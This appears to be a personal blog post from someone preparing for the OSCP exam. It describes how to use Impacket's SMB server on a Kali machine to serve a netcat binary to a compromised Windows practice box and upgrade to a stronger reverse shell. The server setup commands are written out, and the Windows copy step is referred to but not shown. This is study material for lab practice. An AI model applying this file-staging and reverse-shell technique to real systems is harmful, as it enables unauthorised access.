My buddy Julian and I are both on the road to OSCP. We've been setting up study sessions where we attack boxes from TJ Null's list of OSCP-like boxes. It's a live list that's always growing. Worth checking out if you're studying for the exam.
Anyway, I've been avoiding Windows systems for a while, because I – well the truth is, I hate dealing with them. They never have all the cool stuff I need like Netcat or CURL or wget. This makes it a real pain when it comes to trying to transfer files or quickly set up reverse shells.
I'll admit it's a bit n00bish for me to just now be aware of this, but as I say, I've avoided Windows boxes for too long, and had to be pushed to start working on them. (Still hate them, though.)
All that said, I've finally learned a pretty solid way to transfer files to my victim machine when I have a basic derpy shell.
Say hello to Imackpet's SMB Server. It's a Python script that launches an SMB server that I can then use the copy command on Windows to pull a file. In most cases, this is to grab a Netcat binary that I can then use to catch a more solid shell on my attack machine.
First, Install Impacket
First, clone the GitHub repo:
You can do that with
git clone https://github.com/SecureAuthCorp/impacket.git
Once you unpack that sucker, you will run
pip install .
Set up the share and copy the file
From my Kali machine, I run the following command:
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support mewmeow /tmp
This runs impacket using python3. I used the full path to smbserver.py.
-smb2support arg ensured that I'd enabled SMB2. Otherwise, some newer Windows machines will throw an error when you attempt to copy the file.
mewmeow part names the share "mewmeow" and the
/tmp part tells it which directory to share from my Kali machine. In this case, I shared
/tmp and dropped a netcat Windows binary in there.
From the victim machine, I run the following:
This tells the Windows box to copy from the SMB share I just set up. Looks for the
mewmeow share and copies nc.exe to my current directory on Windows.
Easy peasy. So far, it's been one of the more consistently reliable ways to pull this off.